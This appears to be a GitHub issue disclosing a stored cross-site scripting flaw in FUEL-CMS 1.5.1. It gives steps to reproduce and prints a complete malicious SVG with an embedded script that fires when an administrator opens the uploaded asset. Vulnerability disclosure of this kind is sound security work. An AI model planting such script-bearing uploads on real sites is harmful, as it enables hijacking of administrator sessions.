A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .svg file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator  it will trigger a XSS attack

1. login as admin .in the Assets page
![image](https://user-images.githubusercontent.com/57324002/143893166-5679189f-2e92-43a1-ac13-4f3c5de83534.png)

2. upload the malicious svg.  the content of xss-cookie.svg :
```
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400
"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
```
![image](https://user-images.githubusercontent.com/57324002/143893272-ec05eb16-b0a4-4826-9599-e22909b2d194.png)


3. back to Assets  then wo can see xss-cookie.svg have been upload:
![image](https://user-images.githubusercontent.com/57324002/143893849-a72a009e-afe8-49b8-80da-2685c88e8c9f.png)

4. when user click the  xss-cookie.svg   it will trigger a XSS attack
![image](https://user-images.githubusercontent.com/57324002/143893939-e680c062-7dd8-4cd8-9347-3e4355352810.png)



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 #589

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 #589

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions